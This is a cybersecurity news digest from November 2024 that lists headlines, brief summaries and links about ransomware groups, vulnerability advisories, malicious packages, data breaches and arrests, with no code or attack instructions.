Specialized press news

5 Hackers Charged for Attacking Companies via Phishing Text Messages
Federal authorities have unsealed charges against five individuals accused of orchestrating sophisticated phishing schemes that targeted employees of companies across the United States. The alleged hackers reportedly stole confidential company data and millions of dollars in cryptocurrency by exploiting stolen employee credentials. The defendants, ranging in age from 20 to 25, are accused of conspiracy […]
https://gbhackers.com/5-hackers-charged/

Decade-old local privilege escalation bugs impact Ubuntu needrestart package
Decade-old flaws in the needrestart package in Ubuntu Server could allow local attackers to gain root privileges without user interaction. The Qualys Threat Research Unit (TRU) discovered five Local Privilege Escalation (LPE) decade-old security vulnerabilities in the needrestart package that could allow a local attacker to gain root privileges without requiring user interaction. The needrestart […]
https://securityaffairs.com/171228/security/privilege-escalation-bugs-ubuntu-needrestart-package.html

Two Malicious PyPI Packages Mimicking ChatGPT & Claude Steal Developers' Data
Two malicious Python packages masquerading as tools for interacting with popular AI models ChatGPT and Claude were recently discovered on the Python Package Index (PyPI), the official repository for Python libraries. These packages reportedly remained undetected for over a year, silently compromising developer environments and exfiltrating sensitive data. As reported by a cybersecurity researcher, Leonid […]
https://gbhackers.com/two-pypi-malicious-package-mimic-chatgpt-claude/

Helldown Ransomware Attacking VMware ESXi And Linux Servers
Helldown, a new ransomware group, actively exploits vulnerabilities to breach networks; since August 2024 it has compromised 28 victims and leaked their data on a dedicated website. The group has since updated its data leak site, removing three victims, possibly indicating successful ransom payments, while continuing its double extortion tactic of stealing and threatening to […]
https://gbhackers.com/helldown-ransomware-vmware-linux/

USN-7091-2: Ruby vulnerabilities
USN-7091-1 fixed several vulnerabilities in Ruby. This update provides the corresponding update for ruby2.7 in Ubuntu 20.04 LTS. Original advisory details: It was discovered that Ruby incorrectly handled parsing of an XML document that has specific XML characters in an attribute value using the REXML gem. An attacker could use this issue to cause Ruby to crash, resulting in a denial of service. This issue only affected Ubuntu 22.04 LTS and Ubuntu 24.04 LTS. (CVE-2024-35176, CVE-2024-39908, CVE-2024-41123) It was discovered that Ruby incorrectly handled parsing of an XML document that has many entity expansions with the SAX2 or pull parser API. An attacker could use this issue to cause Ruby to crash, resulting in a denial of service. (CVE-2024-41946) It was discovered that Ruby incorrectly...
https://ubuntu.com/security/notices/USN-7091-2

macOS WorkflowKit Race Vulnerability Allows Malicious Apps to Intercept Shortcuts
A race condition vulnerability in Apple's WorkflowKit has been identified, allowing malicious applications to intercept and manipulate shortcuts on macOS systems. This vulnerability, cataloged as CVE-2024-27821, affects the shortcut extraction and generation processes within the WorkflowKit framework, which is integral to the Shortcuts app on macOS Sonoma. The vulnerability arises from […]
https://gbhackers.com/macos-workflowkit-race-vulnerability/

Cyberattack at French hospital exposes health data of 750,000 patients
A data breach at an unnamed French hospital exposed the medical records of 750,000 patients after a threat actor gained access to its electronic patient record system. [...]
https://www.bleepingcomputer.com/news/security/cyberattack-at-french-hospital-exposes-health-data-of-750-000-patients/

Wireshark 4.4.2 Released: What's New!
The Wireshark Foundation has officially announced the release of Wireshark 4.4.2, the latest version of the world's most popular network protocol analyzer. Widely used for troubleshooting, analysis, development, and education, Wireshark continues to be a vital tool for network professionals and enthusiasts. The nonprofit Wireshark Foundation, which promotes protocol analysis education, emphasizes […]
https://gbhackers.com/wireshark-4-4-2/

General press news

Using 'Four Zeros' to boost resilience for smart finance - GovInsider
Also, achieving in-depth security across campuses, data centres, and clouds accelerates cyber attack detection, isolation, and recovery. As a ...
https://govinsider.asia/intl-en/article/using-four-zeros-to-boost-resilience-for-smart-finance

17000 WhatsApp Accounts Of South Asian Cyber Crooks Blocked By Centre - YouTube
Cyber Attack News | 17000 WhatsApp Accounts Of South Asian Cyber Crooks Blocked By Centre | News18 Taking a significant step against offshore ...
https://www.youtube.com/watch?v=F2qnLrGIXFM

TfL cyber attack: Zip card applications reopen for 5-17 year olds - BBC
... cyber-attack that affected its systems two months ago. It also said it is now able to process refunds for all customers who have paid more than ...
https://www.bbc.com/news/articles/cgk1pp73x3xo

17000 WhatsApp Accounts Of South Asian Cyber Crooks Blocked By Centre - News18
Cyber Attack News | 17000 WhatsApp Accounts Of South Asian Cyber Crooks Blocked By Centre | News18. Taking a significant step against offshore ...
https://www.news18.com/videos/breaking-news/cyber-attack-news-17-000-whatsapp-accounts-of-south-asian-cyber-crooks-blocked-by-centre-news18-9127537.html

Italy/UAE : UAE cyber parastatal firm alumnus Luca De Fulgentis launches consultancy
The Abu Dhabi-based OryxLabs' Abu Dhabi office is building a team of battle-hardened cyber-attack experts to pitch its zero-day exploit hunting ...
https://www.intelligenceonline.com/surveillance--interception/2024/11/21/uae-cyber-parastatal-firm-alumnus-luca-de-fulgentis-launches-consultancy,110342521-art

Ukraine fires UK-supplied Storm Shadow missiles into Russia for first time - BBC
Some here do worry about the implications of this - could Russia respond with a cyber attack, or attacking undersea communication cables, for instance ...
https://www.bbc.com/news/live/c20726y20kvt

DDoS Attack Growing Bigger & Dangerous, New Report Reveals - Cyber Security News
https://cybersecuritynews.com/ddos-attack-growing-bigger/

Telangana: Cyber Fraudsters Target Citizens with Fake PM Schemes Apps
People asked to report crime in the Golden Hour which refers to a critical time window where the victim must report a cyber attack or a threat to ...
https://www.deccanchronicle.com/southern-states/telangana/telangana-cyber-fraudsters-target-citizens-with-fake-pm-schemes-apps-1839897

North Korea's Cyber Strategy: An Initial Analysis - Observer Research Foundation
The cyber attack against Sony in 2014 was the first time that North Korea truly captured the world's attention. A year earlier, the Dark Seoul ...
https://www.orfonline.org/research/north-korea-s-cyber-strategy-an-initial-analysis

Intruder 'derails' Pakistan embassy's town hall - Newspaper - DAWN.COM
WASHINGTON: The Pakistan Embassy in the US on Wednesday acknowledged a cyber-attack, when an intruder entered their...
https://www.dawn.com/news/1873755/intruder-derails-pakistan-embassys-town-hall

Large Scale Readiness Begins Again at Niagara - DVIDS
Injects could range anywhere from a simulated cyber attack on a secured network, medical emergencies, disenfranchised Airmen, to chemical attacks, ...
https://www.dvidshub.net/news/485730/large-scale-readiness-begins-again-niagara

A cyber-attack will disrupt Uganda worse than the next pandemic: Let's prepare | Monitor
In my view, the world was lucky that this incident wasn't a result of a malicious cyber-attack but what if it was? And it wouldn't be the first time.
https://www.monitor.co.ug/uganda/oped/letters/a-cyber-attack-will-disrupt-uganda-worse-than-the-next-pandemic-let-s-prepare-4830788


Yesterday's news (specialized press)

The Heart of DolphinScheduler: In-Depth Analysis of the Quartz Scheduling Framework
Delve into Quartz, the mighty open-source Java framework for scheduling tasks, and its dynamic partnership with DolphinScheduler through QuartzExecutorImpl. Find out how they work together to orchestrate workflows and manage timings in our in-depth exploration.
https://hackernoon.com/the-heart-of-dolphinscheduler-in-depth-analysis-of-the-quartz-scheduling-framework?source=rss

SeaTunnel-Powered Data Integration: How 58 Group Handles Over 500 Billion+ Data Points Daily
Unlocking the secrets behind 58 Group's massive data handling. Learn how they process over 500 billion data points daily with Apache SeaTunnel in their data integration platform.
https://hackernoon.com/seatunnel-powered-data-integration-how-58-group-handles-over-500-billion-data-points-daily?source=rss

FlipaClip - 892,854 breached accounts
In November 2024, the animation app FlipaClip suffered a data breach that exposed almost 900k records due to an exposed Firebase server. The impacted data included name, email address, country and date of birth. FlipaClip advised the issue has since been rectified.
https://haveibeenpwned.com/PwnedWebsites#FlipaClip

SquareX Brings Industry's First Browser Detection Response Solution to AISA Melbourne CyberCon 2024
Palo Alto, California, 20th November 2024, CyberNewsWire
https://hackread.com/squarex-brings-industrys-first-browser-detection-response-solution-to-aisa-melbourne-cybercon-2024/

AI: Intelligence or Imitation of Intelligence?
Has AI already learned to think? Will it learn soon? Or is the destiny of even the most advanced programs to remain mere imitators of human intelligence?
https://hackernoon.com/ai-intelligence-or-imitation-of-intelligence?source=rss

The Power of AI-Driven Proxy Management
In Part 4 of our six-part series on advanced web scraping, we dive into the revolutionary role of AI in proxy management. While proxies are essential for anonymity, security, and IP rotation, AI has taken this process to the next level by automating IP rotation, improving scalability, and reducing issues like rate limiting and proxy bans. AI-driven proxies can detect and bypass advanced anti-scraping measures, ensuring smoother, faster, and more reliable scraping. For optimal results, it's best to use a trusted AI-driven proxy provider like Bright Data, rather than implementing AI yourself. Stay tuned for more insights in the next part!
https://hackernoon.com/the-power-of-ai-driven-proxy-management?source=rss

It's Near-Unanimous: AI, ML Make the SOC Better
Efficiency is the name of the game for the security operations center — and 91% of cybersecurity pros say artificial intelligence and machine learning are winning that game.
https://www.darkreading.com/cybersecurity-operations/survey-report-ai-ml-make-soc-better

Ford data breach involved a third-party supplier
Ford is investigating a data breach linked to a third-party supplier and has pointed out that its own systems and customer data were not compromised. Ford opened the investigation after threat actors claimed the theft of customer information on the BreachForums cybercrime forum. On November 17, threat actors IntelBroker and EnergyWeaponUser published a post on BreachForums […]
https://securityaffairs.com/171217/breaking-news/ford-admits-data-breach-linked-third-party-supplier.html

Fintech giant Finastra investigates data breach after SFTP hack
Finastra has confirmed it warned customers of a cybersecurity incident after a threat actor began selling allegedly stolen data on a hacking forum. [...]
https://www.bleepingcomputer.com/news/security/fintech-giant-finastra-investigates-data-breach-after-sftp-hack/

MITRE shares 2024's top 25 most dangerous software weaknesses
MITRE has shared this year's top 25 list of the most common and dangerous software weaknesses behind more than 31,000 vulnerabilities disclosed between June 2023 and June 2024. [...]
https://www.bleepingcomputer.com/news/security/mitre-shares-2024s-top-25-most-dangerous-software-weaknesses/

China's 'Liminal Panda' APT Attacks Telcos, Steals Phone Data
In US Senate testimony, a CrowdStrike exec explained how this advanced persistent threat penetrated telcos in Asia and Africa, gathering SMS messages, unique identifiers, and other metadata along the way.
https://www.darkreading.com/threat-intelligence/china-liminal-panda-telcos-phone-data

Decoding Split Window Sensitivity in Signature Isolation Forests
Sensitivity analysis of Signature Isolation Forests reveals the importance of split windows for anomaly detection. Increasing splits improves accuracy for isolated anomalies while maintaining efficiency for persistent anomalies.
https://hackernoon.com/decoding-split-window-sensitivity-in-signature-isolation-forests?source=rss

AIntivirus Announces Initiative Inspired By The Legacy Of John McAfee
AIntivirus, a global initiative aimed at combating systemic corruption and promoting transparency, launches with a message rooted in the enduring legacy of John McAfee. The project, inspired by McAfee's outspoken stance on accountability and digital security, seeks to create a more equitable and secure digital environment.
https://hackernoon.com/aintivirus-announces-initiative-inspired-by-the-legacy-of-john-mcafee?source=rss

AI Platform bitGPT Experiences Significant Growth Following Binance Demonstration
TALLINN, Estonia, November 20th, 2024/Chainwire/ -- Following its global unveiling on the main stage of Binance's Blockchain Week conference in Dubai, AI platform bitGPT is experiencing sizable growth across every vertical of the project, from active partnership conversations to the number of users currently testing its technology. bitGPT's X and Telegram communities grew in size by more than 1,000% in the days following its presentation at Binance, in which hundreds of onlookers watched as its AI platform was launched and tested for the first time in front of a public audience. The demonstration replay surpassed a quarter-million views on Binance's website within hours of being posted, the most popular replay event of the conference. bitGPT's live demo and subsequent growth have...
https://hackernoon.com/ai-platform-bitgpt-experiences-significant-growth-following-binance-demonstration?source=rss

Fueling KYVE's Expansion Era: A New Age Of Interoperable Data Opportunities For All
KYVE is entering its expansion era, introducing an enhanced web app packed with new features and collaborations to support users and unlock multi-network potential. From experienced developers to crypto newcomers, the platform aims to make it easier for users to jump in, contribute, and benefit as part of KYVE's mission to make blockchain data accessible to all.
https://hackernoon.com/fueling-kyves-expansion-era-a-new-age-of-interoperable-data-opportunities-for-all?source=rss

PlayBlock Rockets To 8 Globally In Blockchain Transactions And Turnover Following DappRadar Listing
PlayBlock has achieved the remarkable milestone of being ranked #8 globally in daily transactions. At the forefront of PlayBlock's ecosystem is its flagship dApp, UpVsDown.com, a cutting-edge prediction market platform. With its listing on DappRadar, PlayBlock is recognized as a global leader, surpassing hundreds of established blockchains.
https://hackernoon.com/playblock-rockets-to-8-globally-in-blockchain-transactions-and-turnover-following-dappradar-listing?source=rss

US charges five linked to Scattered Spider cybercrime gang
The U.S. Justice Department has charged five suspects believed to be part of the financially motivated Scattered Spider cybercrime gang with conspiracy to commit wire fraud. [...]
https://www.bleepingcomputer.com/news/security/us-charges-five-linked-to-scattered-spider-cybercrime-gang/

First Digital's FDUSD Stablecoin Is Officially Live On Sui
FDUSD is the second multi-billion dollar market cap stablecoin to natively integrate with Sui in recent months. FDUSD's multi-chain compatibility now extends to Sui, providing a genuinely interoperable stablecoin capable of driving DeFi applications across countless additional platforms. “We are thrilled to launch FDUSD on Sui and look forward to the new possibilities this integration brings,” said Vincent Chok, Founder and CEO of First Digital.
https://hackernoon.com/first-digitals-fdusd-stablecoin-is-officially-live-on-sui?source=rss

Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root
Five local privilege escalation (LPE) vulnerabilities have been discovered in the needrestart utility used by Ubuntu Linux, which was introduced over 10 years ago in version 21.04. [...]
https://www.bleepingcomputer.com/news/security/ubuntu-linux-impacted-by-decade-old-needrestart-flaw-that-gives-root/

Why Everyone is Wrong About the Future of Work™
The future of work is a debate where everyone's got an opinion. Not everyone agrees on what the future holds, and their predictions are more like pieces of a play than concrete roadmaps.
https://hackernoon.com/why-everyone-is-wrong-about-the-future-of-worktm?source=rss

Redefining Anomaly Detection with Signature Isolation Forests
Signature Isolation Forest (SIF) and Kernel Signature Isolation Forest (K-SIF) enhance anomaly detection by addressing FIF's limitations. K-SIF uses kernel signatures for nonlinear feature space exploration, while SIF is fully data-driven, requiring no dictionaries.
https://hackernoon.com/redefining-anomaly-detection-with-signature-isolation-forests?source=rss

US and UK Military Social Network “Forces Penpals” Exposes SSN, PII Data
Forces Penpals, a social network for US and UK military personnel, exposed the sensitive data of 1.1M users,…
https://hackread.com/us-uk-military-forces-penpals-exposes-ssn-pii-data/

Alleged Ford 'Breach' Encompasses Auto Dealer Info
Cybersecurity investigators found the leaked data to be information from a third party, not Ford itself, that is already accessible to the public and not sensitive in nature.
https://www.darkreading.com/cyberattacks-data-breaches/alleged-ford-breach-auto-dealer-info

Mageia 2024-0365: thunderbird Security Advisory Updates
Potential disclosure of plaintext in OpenPGP encrypted message. (CVE-2024-11159) References: - https://bugs.mageia.org/show_bug.cgi?id=33763
https://linuxsecurity.com/advisories/mageia/mageia-2024-0365-thunderbird-security-advisory-updates-xhpw9em7pg3d

Leveling Up Fuzzing: Finding more vulnerabilities with AI
Posted by Oliver Chang, Dongge Liu and Jonathan Metzman, Google Open Source Security Team. Recently, OSS-Fuzz reported 26 new vulnerabilities to open source project maintainers, including one vulnerability in the critical OpenSSL library (CVE-2024-9143) that underpins much of internet infrastructure. The reports themselves aren't unusual—we've reported and helped maintainers fix over 11,000 vulnerabilities in the 8 years of the project. But these particular vulnerabilities represent a milestone for automated vulnerability finding: each was found with AI, using AI-generated and enhanced fuzz targets. The OpenSSL CVE is one of the first vulnerabilities in a critical piece of software that was discovered by LLMs, adding another real-world example to a recent Google discovery of an exploitable...
http://security.googleblog.com/2024/11/leveling-up-fuzzing-finding-more.html

Microsoft confirms game audio issues on Windows 11 24H2 PCs
Microsoft says a Windows 24H2 bug causes game audio to unexpectedly increase to full volume when using USB DAC sound systems. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-game-audio-issues-on-windows-11-24h2-pcs/

Fedora 41: llvm-test-suite 2024-6d9aba8c3c Security Advisory Updates
Remove ClamAV subdirectory because of viruses in input files: These were the findings: MultiSource/Applications/ClamAV/inputs/rtf-test/rtf1.rtf: Eicar-Signature MultiSource/Applications/ClamAV/inputs/clam.zip: Clamav.Test.File-6 MultiSource/Applications/ClamAV/inputs/rtf-test/docCLAMexe.rtf:
https://linuxsecurity.com/advisories/fedora/fedora-41-llvm-test-suite-2024-6d9aba8c3c-security-advisory-updates-huq32mkqgdnq

New Ghost Tap attack abuses NFC mobile payments to steal money
Cybercriminals have devised a novel method to cash out from stolen credit card details linked to mobile payment systems such as Apple Pay and Google Pay, dubbed 'Ghost Tap,' which relays NFC card data to money mules worldwide. [...]
https://www.bleepingcomputer.com/news/security/new-ghost-tap-attack-abuses-nfc-mobile-payments-to-steal-money/

Multiple Vulnerabilities in Wowza Streaming Engine (Fixed)
Rapid7 is disclosing multiple vulnerabilities in Wowza Streaming Engine below v4.9.1. These vulnerabilities are tracked as CVE-2024-52052, CVE-2024-52053, CVE-2024-52054, CVE-2024-52055, and CVE-2024-52056. They are patched as of Wowza Streaming Engine v4.9.1.
https://blog.rapid7.com/2024/11/20/multiple-vulnerabilities-in-wowza-streaming-engine-fixed/

Really Simple Security Plugin Flaw Risks 4+ Million WordPress Websites
Heads up, WordPress admins! The WordPress plugin Really Simple Security had a serious security flaw.…
https://latesthackingnews.com/2024/11/20/really-simple-security-plugin-flaw-risks-4-million-wordpress-websites/

Fedora 40: llvm-test-suite 2024-300397332b Security Advisory Updates
Remove ClamAV subdirectory because of viruses in input files: These were the findings: MultiSource/Applications/ClamAV/inputs/rtf-test/rtf1.rtf: Eicar-Signature MultiSource/Applications/ClamAV/inputs/clam.zip: Clamav.Test.File-6 MultiSource/Applications/ClamAV/inputs/rtf-test/docCLAMexe.rtf:
https://linuxsecurity.com/advisories/fedora/fedora-40-llvm-test-suite-2024-300397332b-security-advisory-updates-lxg0cnzev0j7

ANY.RUN Sandbox Automates Interactive Analysis of Complex Cyber Attack Chains
ANY.RUN, a well-known interactive malware analysis platform, has announced Smart Content Analysis, an enhancement to its Automated Interactivity feature. This new mechanism is designed to automatically analyze and detonate complex malware and phishing attacks, providing investigators with quicker and more detailed insights into malicious behavior. Speed Optimization for Investigations: Accelerates the analysis workflow, saving time […]
https://gbhackers.com/any-run-sandbox-now-automates-interactive-analysis/

Hacker obtained documents tied to lawsuit over Matt Gaetz's sexual misconduct allegations
A hacker allegedly accessed a file containing testimony from a woman claiming she had sex with Matt Gaetz when she was 17, sparking controversy. The New York Times reported that a hacker, who goes online by the name Altam Beezley, gained access to files containing confidential testimony from a woman who claims she had […]
https://securityaffairs.com/171207/security/matt-gaetzs-sexual-misconduct-allegations-doc-compromised.html

Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 20)
We detail the observed limited activity regarding authentication bypass vulnerability CVE-2024-0012 affecting specific versions of PAN-OS software, and include protections and mitigations.
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/

Apple Urgently Patches Actively Exploited Zero-Days
Though information regarding the exploits is limited, the company did report that Intel-based Mac systems have been targeted by cybercriminals looking to exploit CVE-2024-44308 and CVE-2024-44309.
https://www.darkreading.com/cyberattacks-data-breaches/apple-patches-actively-exploited-zero-days

Ransom & Dark Web Issues Week 3, November 2024
ASEC Blog publishes Ransom & Dark Web Issues Week 3, November 2024. New Ransomware Gang Termite: Four Victim Companies Revealed, Including a U.S. Auto Parts Supplier and a German Social Welfare Organization. New Ransomware Gang Chort: Six Victim Companies Revealed, Including the Kuwait Public Authority for Agriculture and Fish Resources […]
https://asec.ahnlab.com/en/84664/

Small US Cyber Agencies Are Underfunded & That's a Problem
If the US wants to maintain its lead in cybersecurity, it needs to make the tough funding decisions that are demanded of it.
https://www.darkreading.com/vulnerabilities-threats/us-cyber-agencies-underfunded-problem

Hackers Exploit Misconfigured Jupyter Servers for Illegal Sports Streaming
Aqua Nautilus' research reveals hackers are leveraging vulnerable and misconfigured Jupyter Notebook servers to steal live sports streams.…
https://hackread.com/hackers-exploit-misconfigured-jupyter-servers-sports-streaming/

ANY.RUN Sandbox Now Automates Interactive Analysis of Complex Cyber Attack Chains
Dubai, United Arab Emirates, 20th November 2024, CyberNewsWire
https://hackread.com/any-run-sandbox-now-automates-interactive-analysis-of-complex-cyber-attack-chains/

Who's managing cybersecurity at organizations that don't have a CISO?
This week in cybersecurity from the editors at Cybercrime Magazine. Read the full story in CSO. Sausalito, Calif., Nov. 20, 2024: Many companies have yet to embrace the role of chief information security officer (CISO), but with the ever-expanding threat landscape, there are growing
https://cybersecurityventures.com/whos-managing-cybersecurity-at-organizations-that-dont-have-a-ciso/

'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse
An elusive, sophisticated cybercriminal group has used known and zero-day vulnerabilities to compromise more than 20,000 SOHO routers and other IoT devices so far, and then puts them up for sale on a residential proxy marketplace for state-sponsored cyber-espionage actors and others to use.
https://www.darkreading.com/cloud-security/water-barghest-sells-hijacked-iot-devices-proxy-botnet-misuse

Rekoobe Backdoor In Open Directories Possibly Attacking TradingView Users
APT31, using the Rekoobe backdoor, has been observed targeting TradingView, a popular financial platform, as researchers discovered malicious domains mimicking TradingView, suggesting a potential interest in compromising the platform's user community. By analyzing shared SSH keys, investigators identified additional infrastructure linked to this campaign and another open directory, highlighting the evolving tactics employed by APT31 […]
https://gbhackers.com/rekoobe-backdoor-tradingview/

Water Barghest Botnet Comprised 20,000+ IoT Devices By Exploiting Vulnerabilities
Water Barghest, a sophisticated botnet, exploits vulnerabilities in IoT devices to enlist them in a residential proxy marketplace by leveraging automated scripts to identify vulnerable devices from public databases like Shodan. When the device is compromised, the Ngioweb malware is installed in a stealthy manner, thereby establishing a connection to command-and-control servers. The infected device […] The post Water Barghest Botnet Comprised 20,000+ IoT Devices By Exploiting Vulnerabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/water-barghest-iot-exploit/

Fedora 39: chromium 2024-9c44ad3527 Security Advisory Updates
Update to 130.0.6723.116
https://linuxsecurity.com/advisories/fedora/fedora-39-chromium-2024-9c44ad3527-security-advisory-updates-gwpnhm0rvwbx

North Korean IT Worker Using Weaponized Video Conference Apps To Attack Job Seekers
North Korean IT workers, operating under the cluster CL-STA-0237, have been implicated in recent phishing attacks leveraging malware-infected video conference apps. The group, likely based in Laos, has demonstrated a sophisticated approach, infiltrating a U.S.-based SMB IT services company to gain access to sensitive information and secure a position at a major tech company. It […] The post North Korean IT Worker Using Weaponized Video Conference Apps To Attack Job Seekers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/north-korean-it-worker-attacks/

Ubuntu 7123-1: Linux kernel (Azure) Security Advisory Updates
Several security issues were fixed in the Linux kernel.
https://linuxsecurity.com/advisories/ubuntu/ubuntu-7123-1-linux-kernel-azure-security-advisory-updates-f5btv0midyxl

Rapid7 Extends AWS Support to Include Coverage for Newly-Launched Resource Control Policies (RCPs)
Rapid7 is excited to announce our support for Amazon Web Services' (AWS) new Resource Control Policies (RCPs), a powerful tool designed to bolster security controls for organizations using AWS infrastructure.
https://blog.rapid7.com/2024/11/20/rapid7-extends-aws-support-to-include-coverage-for-newly-launched-resource-control-policies-rcps/

Protecting your digital assets from non-human identity attacks
Untethered data accessibility and workflow automation are now foundational elements of most digital infrastructures. With the right applications and protocols in place, businesses no longer need to feel restricted by their lack of manpower or technical capabilities: machines are now filling those gaps. The use of non-human identities (NHIs) to power business-critical applications […] The post Protecting your digital assets from non-human identity attacks appeared first on Security Intelligence.
https://securityintelligence.com/articles/protecting-digital-assets-non-human-identity-attacks/

Ubuntu 7121-2: Linux kernel (Azure) Security Advisory Updates
Several security issues were fixed in the Linux kernel.
https://linuxsecurity.com/advisories/ubuntu/ubuntu-7121-2-linux-kernel-azure-security-advisory-updates-m6twan4nsh9w

“Sad announcement” email leads to tech support scam
People are receiving disturbing emails that appear to imply something has happened to their friend or family member.
https://www.malwarebytes.com/blog/news/2024/11/sad-announcement-email-leads-to-tech-support-scam

Amazon and Audible flooded with 'forex trading' and warez listings
Amazon, Amazon Music, and Audible, an Amazon-owned online audiobook and podcast service, have been flooded with bogus listings that push dubious "forex trading" sites, Telegram channels, and suspicious links claiming to offer pirated software. [...]
https://www.bleepingcomputer.com/news/security/amazon-and-audible-flooded-with-forex-trading-and-warez-listings/

USN-7120-2: Linux kernel vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems:
- File systems infrastructure;
- Network traffic control;
(CVE-2024-46800, CVE-2024-43882)
https://ubuntu.com/security/notices/USN-7120-2

USN-7121-2: Linux kernel (Azure) vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems:
- ARM64 architecture;
- S390 architecture;
- x86 architecture;
- Block layer subsystem;
- Cryptographic API;
- ATM drivers;
- Device frequency scaling framework;
- GPU drivers;
- Hardware monitoring drivers;
- VMware VMCI Driver;
- Network drivers;
- Device tree and open firmware driver;
- SCSI drivers;
- Greybus lights staging drivers;
- BTRFS file system;
- File systems infrastructure;
- F2FS file system;
- JFS file system;
- NILFS2 file system;
- Netfilter;
- Memory management;
- Ethernet bridge;
- IPv6 networking;
- IUCV driver;
- Logical Link layer;
- MAC80211...
https://ubuntu.com/security/notices/USN-7121-2

USN-7123-1: Linux kernel (Azure) vulnerabilities
It was discovered that the CIFS network file system implementation in the Linux kernel did not properly validate certain SMB messages, leading to an out-of-bounds read vulnerability. An attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2023-6610)
Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, and Shweta Shinde discovered that the Confidential Computing framework in the Linux kernel for x86 platforms did not properly handle 32-bit emulation on TDX and SEV. An attacker with access to the VMM could use this to cause a denial of service (guest crash) or possibly execute arbitrary code. (CVE-2024-25744)
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise...
https://ubuntu.com/security/notices/USN-7123-1

AlmaLinux 9.5 Released: Exploring Key Updates & Improvements
Upgrading and maintaining your operating system is crucial to optimal performance and security. AlmaLinux, a widely used open-source Linux distribution, recently released version 9.5 with new features and security enhancements that will benefit any admin or organization running
https://linuxsecurity.com/news/security-projects/almalinux-9-5-released-exploring-key-updates-improvements

The Dual Edge of Open Source: Examining Key Benefits and Security Challenges
Open-source software (OSS) adoption has increased dramatically over recent years due to its flexibility and cost-cutting benefits, but whether or not OSS is completely safe is often controversial. Due to its open and collaborative nature, this type of software presents unique advantages and security challenges.
https://linuxsecurity.com/features/features/examining-open-source-benefits-security-challenges

Update now! Apple confirms vulnerabilities are already being exploited
Apple has released security updates that look especially important for Intel-based Macs because they are already being exploited in the wild.
https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited

Analyzing the Emergence of Helldown Ransomware Targeting Linux & VMware Systems
Recently, cybersecurity researchers discovered a Linux variant of the Helldown ransomware strain. This finding signals that threat actors have begun targeting VMware and Linux systems as attack vectors, indicating an increased focus on such platforms in attacks against Linux-based machines.
https://linuxsecurity.com/news/hackscracks/helldown-ransomware-targeting-linux-vmware-systems

Mitigating the Risk of Cybercrime While Traveling Abroad
Global tourism is reaching pre-pandemic records and many people are eager to embark on a new adventure. Yet at the same time, incidents of cybercrimes are increasing at a staggering... The post Mitigating the Risk of Cybercrime While Traveling Abroad appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/mitigating-the-risk-of-cybercrime-while-traveling-abroad/

How Bitcoin's digital signature feature facilitates Web3 adoption
Bitcoin is a pioneer in technological advancement and decentralization. As its creator states in the white paper, peer-to-peer…
https://hackread.com/bitcoin-digital-signature-feature-web3-adoption/

Linux Variant of Helldown Ransomware Targets VMware ESX Servers
Cybersecurity firm Sekoia has discovered a new variant of Helldown ransomware. The article details their tactics and how…
https://hackread.com/helldown-ransomware-linux-variant-vmware-esx-servers/

Threat Assessment: Ignoble Scorpius, Distributors of BlackSuit Ransomware
Explore this assessment on cybercrime group Ignoble Scorpius, distributors of BlackSuit ransomware. Since May 2023, operations have increased, affecting critical sectors. The post Threat Assessment: Ignoble Scorpius, Distributors of BlackSuit Ransomware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/threat-assessment-blacksuit-ransomware-ignoble-scorpius/

Apple addressed two actively exploited zero-day vulnerabilities
Apple released security updates for iOS, iPadOS, macOS, visionOS, and Safari browser to address two actively exploited zero-day flaws. Apple released security updates for two zero-day vulnerabilities, tracked as CVE-2024-44309 and CVE-2024-44308, in iOS, iPadOS, macOS, visionOS, and Safari web browser, which are actively exploited in the wild. The vulnerability CVE-2024-44309 is a cookie management issue […]
https://securityaffairs.com/171202/security/apple-fixed-2-actively-exploited-zero-day-bugs.html

AI Granny Daisy takes up scammers' time so they can't bother you
An Artificial Intelligence model called Daisy has been deployed to waste phone scammers' time so they can't defraud real people.
https://www.malwarebytes.com/blog/news/2024/11/ai-granny-daisy-takes-up-scammers-time-so-they-cant-bother-you

Glove Stealer Emerges A New Malware Threat For Browsers
Researchers discovered a new malware running active campaigns in the wild, infecting browsers. Identified as… Glove Stealer Emerges A New Malware Threat For Browsers on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/20/glove-stealer-emerges-a-new-malware-threat-for-browsers/

The Future of Mobile Security: Emerging Threats and Countermeasures
As mobile devices like smartphones and tablets become increasingly ubiquitous, mobile security is more important… The Future of Mobile Security: Emerging Threats and Countermeasures on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/20/the-future-of-mobile-security-emerging-threats-and-countermeasures/

African Reliance on Foreign Suppliers Boosts Insecurity Concerns
Recent backdoor implants and cyber-espionage attacks on their supply chains have African organizations looking to diversify beyond Chinese, American tech vendors.
https://www.darkreading.com/cyber-risk/african-reliance-on-foreign-suppliers-boosts-insecurity

Unsecured JupyterLab and Jupyter Notebooks servers abused for illegal streaming of Sports events
Threat actors exploit misconfigured JupyterLab and Jupyter Notebooks servers to rip sports streams and illegally redistribute them. Researchers from security firm Aqua observed threat actors exploiting misconfigured JupyterLab and Jupyter Notebook servers to hijack environments, deploy streaming tools, and duplicate live sports broadcasts on illegal platforms. "Threat actors using misconfigured servers to hijack environments for […]
https://securityaffairs.com/171193/cyber-crime/misconfigured-jupyterlab-and-jupyter-notebooks-illegal-live-sports-streaming.html

DeepTempo Launches AI-Based Security App for Snowflake
